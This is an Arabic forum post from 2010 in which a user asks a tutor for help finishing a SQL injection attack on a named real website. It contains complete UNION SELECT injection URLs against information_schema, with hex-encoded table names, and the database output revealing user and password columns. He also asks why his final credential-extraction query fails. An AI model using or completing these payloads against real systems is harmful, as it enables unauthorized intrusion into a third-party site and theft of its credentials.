السلام عليكم
اخوانى الكرام
انا جيبت موقع فيه ثغره وطبقت عليها دروس الاخ فولكانو وانا انتظرك بنفسك يا فولكانو ترد عليا الله يكرمك لانى صراحة فى كلاب صعرانه بتجرى فى دماغى دلوقت LOL
المهم اخى انا لا اطيل عليك
الموقع اهو
كود PHP:
http://ismythesishotornot.com/index.php?id=-802 union select 1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5+from+information_schema.columns+where+column_name+like+CHAR(37, 112, 97, 115, 115, 37)--
وانا يا اخى عملت الى انت قولت عليه طلعلى عمود الادمن والباس وقاعدة البيانات بالشكل ده
user:Password:mysql
طبعا القاعده الاصدار الخامس وما نسيت امر version()
المهم الان المفروض ان
user
هوا عمود الادمن بعد الكود الى حضرتك شايفه ده
وعمود الباس الي هوا
password
و mysql الى هوا جدول السيغما
طيب الان انظر اخى
جيت اشفر ال عمود User
زي ما حضرتك قولت فى الدرس وادي التشفير اهو
0x75736572
حطيت الامر ده زي ما انت قولت
where+table_name=0x75736572--
طلعلى عمود الاسماء باسم Host
ودي الى طلعت بالضبط
user:Host:mysql
وادى الكود كاملا عشان تشوفه برضه مع العلم العمود المصاب فى هذا الموقع عمود رقم ثلاثه فقط
كود PHP:
http://ismythesishotornot.com/index.php?id=-802 union select 1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5+from+information_schema.columns+where+table_name=0x75736572--
المفروض بقى انى هحط التجهيزه بتاعتى بالطريقه دي حسب شرح حضرتك بناء على انى استعلمت على التيبل نيم الى هوا اسم الجدول واليوزر نيم الى هوا اسم المستخدم والباسورد الى هوا مشفر زي ما علمتنا
يعنى هيبقى كده
concat(table_name,0x3a,column_name,0x3a,table_sche ma)
بعد التعديل هيبقى كده
concat(Host,0x3a,Pass)
للعلم طلع معاي الجدول باسم password
وجربتها ايضا
الان لما اجي اعمل Execute من الهاك بار
يقولى
Looks like we had an error. Please check back later.
يعنى فيه خطاء مع العلم ان كل حقنتى صح وانا راجعتها الف مره بس ممكن يكون فى حاجه انت شايفها وانا مش واخد بالى منها سبحان الله جت ع الخطوة الاخيرة وضربت خالص ياريت اخى توضحلى ايه المشكله بالضبط
تحياتى وانتظر الرد
05-02-2010, 05:55 AM
مساعده فى ان عمود اليوزر يعطينى خطاء سبحان الله مع انه صحيح بعد التخمين
المواضيع المتشابهه
العرض الشجري